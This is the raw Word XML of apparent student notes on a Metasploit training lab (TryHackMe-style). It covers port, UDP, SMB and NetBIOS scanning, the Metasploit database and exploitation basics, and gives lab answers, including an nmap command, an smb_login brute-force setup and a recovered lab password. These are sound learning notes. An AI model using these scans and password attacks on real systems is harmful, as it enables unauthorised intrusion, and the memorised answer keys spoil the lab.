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8"/>
          <w:szCs w:val="48"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>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-395259</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>473194</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="273844" cy="309562"/>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rot="0" flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="273843" cy="30956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4" type="#_x0000_t4" style="position:absolute;z-index:3072;o:allowoverlap:true;o:allowincell:true;mso-position-horizontal-relative:text;margin-left:-31.12pt;mso-position-horizontal:absolute;mso-position-vertical-relative:text;margin-top:37.26pt;mso-position-vertical:absolute;width:21.56pt;height:24.37pt;mso-wrap-distance-left:9.07pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:9.07pt;mso-wrap-distance-bottom:0.00pt;rotation:0;visibility:visible;" fillcolor="#5B9BD5" strokecolor="#2D4D6A" strokeweight="1.00pt"/>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-413119</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="309562" cy="309562"/>
                <wp:effectExtent l="6350" t="6350" r="6350" b="6350"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name=""/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="0" name=""/>
                      <wps:cNvSpPr/>
                      <wps:spPr bwMode="auto">
                        <a:xfrm rot="0" flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="309562" cy="309562"/>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3" type="#_x0000_t13" style="position:absolute;z-index:2048;o:allowoverlap:true;o:allowincell:true;mso-position-horizontal-relative:text;margin-left:-32.53pt;mso-position-horizontal:absolute;mso-position-vertical-relative:text;margin-top:0.00pt;mso-position-vertical:absolute;width:24.37pt;height:24.37pt;mso-wrap-distance-left:9.07pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:9.07pt;mso-wrap-distance-bottom:0.00pt;rotation:0;visibility:visible;" fillcolor="#5B9BD5" strokecolor="#2D4D6A" strokeweight="1.00pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">METASPLOIT : EXPLOITATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="4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u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">SCANNING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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t xml:space="preserve">1. Port scanning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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit has a number of modules to scan open ports on the target system and </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">network. You can list potential port scanning modules available using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">portscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">command : use auxiliary/scanner/portscan/tcp and press enter.</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tab/>
        <w:t xml:space="preserve">You get :- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">msf auxiliary(scanner/portscan/tcp) &gt;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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Type : show options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tab/>
        <w:t xml:space="preserve">In that you get some option to set,</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tab/>
        <w:t xml:space="preserve">1)CONCURRENCY : number of target will scan simultaneously</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tab/>
        <w:t xml:space="preserve">2)PORTS : port to be scanned.nmap will scan port from 1-1000 but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cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Metasploit will scan port from 1-10000.</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firstLine="708" w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">3)RHOSTS : target or targets to be scanned.</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firstLine="708" w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">4)THREAD : number of tasks run concurrently.</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firstLine="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">2. UDP SERVICE IDENTIFICATION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720" w:left="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">The auxiliary/scanner/discovery/udp_sweep module allow you identify udp services</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720" w:left="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Like DNS or Netbios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0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">3. SMB SCANS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720" w:left="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Metasploit offers serveral module for scanning specific service.we scan SMB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0" w:left="0"/>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 NetBIOS (Network Basic Input Output System), similar to SMB, allows computers to communicate over the network to share files or send files to printers.</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0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Module : auxiliary/scanner/smb</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0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Questions :</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0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">How many ports are open on the target system? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer : use command – nmap –sS –v &lt;target-ip&gt; : 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Using the relevant scanner, what NetBIOS name can you see?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer : use module : auxiliary/scanner/Netbios/nbname and set relevant options : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ACME IT SUPPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">What is running on port 8000?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer : use nmap –sS –sV –p 8000 &lt;target-ip&gt; : webfs/1.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">4)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer : use module : auxiliary/scanner/smb/smb_login . In that set options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">1)PASS_FILE   2)smbuser and 3) RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer : leo1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">4)THE METASPLOIT DATABASE :</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You will first need to start the PostgreSQL database, which Metasploit will use with the following command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl start postgresql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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t xml:space="preserve">Then you will need to initialize the Metasploit Database using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfdb init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. However, trying to run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfdb init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root will give the following error message, "Please run msfdb as a non-root user." This can be solved by running it as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> account using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u postgres msfdb init</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The terminal below shows the example output. As mentioned, the steps below have already been performed on the AttackBox; however, if you are interested in repeating them, you will need to delete the existing database first using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u postgres msfdb delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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You can now launch msfconsole and check the database status using the db_status command.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The database feature will allow you to create workspaces to isolate  different projects. When first launched, you should be in the default  workspace. You can list available workspaces using the   workspace command. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You can add a workspace using the -a parameter or delete a workspace using the -d parameter, respectively. The screenshot below shows that a new workspace named "tryhackme"   was created.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t xml:space="preserve">You can use the workspace -h command to list available options for the workspace command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run a Nmap scan using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , all results will be saved to the database.</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You can now reach information relevant to hosts and services running on target systems with the hosts and services commands, respectively.  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Once the host information is stored in the database, you can use the   hosts -R command to add this value to the RHOSTS parameter.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5)VULNERABILITY SCANNING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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit allows you to identify some critical vulnerabilities that considered as “low hanging fruit”. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The low hanging fruit term is refer to some easily identifiable and exploiting vulnerability that could gain to foothold on system,in some case high-level privileges such as root and administrator.</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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding vulnerabilities using Metasploit will rely heavily on your ability to scan and fingerprint the target.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">you may use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> function on Metasploit to list useful modules.</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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to identify VNC service on target then you use search function on metasploit. As well as you can use info command for more details about module.</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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Questions :</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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Who wrote the module that allows us to check SMTP servers for open relay?</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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer : use search and info command for smtp_relay module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> : campbell murray</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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">5)EXPLOITATION :</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pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You can search exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Most of the exploits will have a preset default payload. However, you can always use the show payloads command to list other commands you can use with that specific exploit. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w: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t xml:space="preserve">Once you have decided on the payload, you can use the set p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ayload command to make your choice. Once session is opened,you background it using CTRL+z and abort it using CTRL+c. Backgrounding a sessions will helpful when you exploit more than one target simultaneously and you perform different exploit on one target.</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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Working with sessions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highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w: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sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command will list all active sessions. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
